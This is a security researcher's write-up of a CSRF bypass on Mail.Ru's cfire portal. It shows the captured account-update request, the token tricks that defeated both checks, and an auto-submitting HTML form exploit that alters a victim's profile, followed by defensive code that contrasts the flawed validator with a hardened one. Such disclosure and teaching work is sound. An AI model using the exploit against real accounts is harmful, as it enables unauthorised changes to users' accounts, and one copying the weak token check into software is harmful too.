How I bypassed multiple CSRF protections in Mail.Ru’s cFire

While I was pentesting many sub-domains of Mail.Ru at the same time, I came upon cfire.mail.ru. Since this one also had a user portal, it caught my eye!

I first started testing for Cross-Site Scripting issues in the different (GET/POST) parameters. While fuzzing them, I kept Burp Suite interception ON, so it was capturing all the requests as an intercepting proxy.

Whilst fuzzing the POST request sent to the /account endpoint, this request came up:

POST /account/ HTTP/1.1
Host: cfire.mail.ru
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://cfire.mail.ru/account/
Cookie: <cookies-here>
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 167

signature=<csrf-token here>&firstname=Hacked&lastname=&bdday=0&bdmonth=0&bdyear=0&postindex=&country=&city=&address=&submit2=<another 9-character csrf-token here>


I found that there are two CSRF tokens:

  • signature – a long CSRF token
  • submit2 – a nine-character token made up of numbers and letters

I tried bypassing both CSRF protections by removing both parameters – it didn’t work 🙁

After spending some time on it, I removed the value (not the parameter itself) of the signature parameter and replayed the request. It worked!

Now the next target for me was to bypass submit2. I also tried removing the value of submit2 – but this time, this technique didn’t work! So I tried different ways of bypassing it.

After 15-ish minutes, I tried replacing the nine-character alphanumeric value of submit2 with nine X characters (i.e. XXXXXXXXX). And guess what? It worked. BOOM! Now I made an HTML exploit for this specific CSRF issue, which looked something like this:

<html>
  <body>
    <!-- Same fields as the captured /account/ POST, with the two token fields
         set to the values that were found to pass validation -->
    <form action="https://cfire.mail.ru/account/" method="POST" name="exploit">
      <input type="hidden" name="signature" value="" />
      <input type="hidden" name="firstname" value="Pwn3d" />
      <input type="hidden" name="lastname" value="" />
      <input type="hidden" name="bdday" value="0" />
      <input type="hidden" name="bdmonth" value="0" />
      <input type="hidden" name="bdyear" value="0" />
      <input type="hidden" name="postindex" value="" />
      <input type="hidden" name="country" value="" />
      <input type="hidden" name="city" value="" />
      <input type="hidden" name="address" value="" />
      <input type="hidden" name="submit2" value="XXXXXXXXX" />
    </form>
    <!-- Auto-submit the form as soon as the page loads -->
    <script>document.exploit.submit()</script>
  </body>
</html>

I tried this exploit against different cFire accounts, and it worked! So in simple words:

Removing the value of signature AND changing the value of submit2 to XXXXXXXXX bypasses both protections.
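To make the two server-side mistakes concrete, here is an added example (not Mail.Ru's code, and not part of the original post) that reconstructs a validator behaving the way the write-up observed, alongside a hardened one, and replays the request variants from the post against both. The session token values and the form fields are constructed for the example; the real tokens were redacted in the capture above.

```python
import hmac

# Constructed sample session state: the tokens the server issued to this user.
# Hypothetical values; the write-up redacts the real ones.
SESSION = {
    "signature": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934c",  # long token
    "submit2": "k7Qp2xZ9m",                                            # 9 chars
}

# The non-token fields of the captured POST /account/ body.
BASE_FORM = {
    "firstname": "Hacked", "lastname": "", "bdday": "0", "bdmonth": "0",
    "bdyear": "0", "postindex": "", "country": "", "city": "", "address": "",
}


def validate_weak(session, form):
    """Hypothetical reconstruction of a validator that behaves like the one
    observed in the write-up (NOT the real implementation):
    - a missing parameter is rejected, but an empty signature skips the
      comparison entirely (fail-open);
    - submit2 is only checked for its length, never for its value."""
    sig = form.get("signature")
    if sig is None:
        return False                       # parameter absent -> reject
    if sig and sig != session["signature"]:
        return False                       # compared only when non-empty (bug 1)
    sub = form.get("submit2")
    if sub is None or len(sub) != 9:
        return False                       # length-only check (bug 2)
    return True


def validate_fixed(session, form):
    """Hardened validator: every token must be present, non-empty and equal
    to the value bound to this session, compared in constant time."""
    for name in ("signature", "submit2"):
        submitted = form.get(name)
        expected = session.get(name)
        if not submitted or not expected:  # empty string and None both fail
            return False
        if not hmac.compare_digest(submitted.encode(), expected.encode()):
            return False
    return True


def request_variants(session):
    """The requests tried in the write-up, as form dicts."""
    return {
        "legitimate": dict(BASE_FORM, signature=session["signature"],
                           submit2=session["submit2"]),
        "both parameters removed": dict(BASE_FORM),
        "empty signature": dict(BASE_FORM, signature="",
                                submit2=session["submit2"]),
        "empty submit2": dict(BASE_FORM, signature="", submit2=""),
        "empty signature + XXXXXXXXX": dict(BASE_FORM, signature="",
                                            submit2="XXXXXXXXX"),
    }


def run(validator, session=SESSION):
    """Map each request variant to whether the given validator accepts it."""
    return {name: validator(session, form)
            for name, form in request_variants(session).items()}


if __name__ == "__main__":
    for label, validator in (("weak", validate_weak), ("fixed", validate_fixed)):
        print(f"--- {label} validator ---")
        for name, accepted in run(validator).items():
            print(f"{name:30s} {'ACCEPTED' if accepted else 'rejected'}")
```

Running it shows the weak validator accepting exactly the variants the post found to work (empty signature, and empty signature plus nine X's) while rejecting the ones that failed (both parameters removed, empty submit2), and the hardened validator accepting only the legitimate request. The fix is not a second token but treating "empty" like "missing" and comparing the full value against session state; a length check on its own is no check at all.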

Thanks for reading till here, I hope you learned something. Happy Hacking!

Ahsan Tahir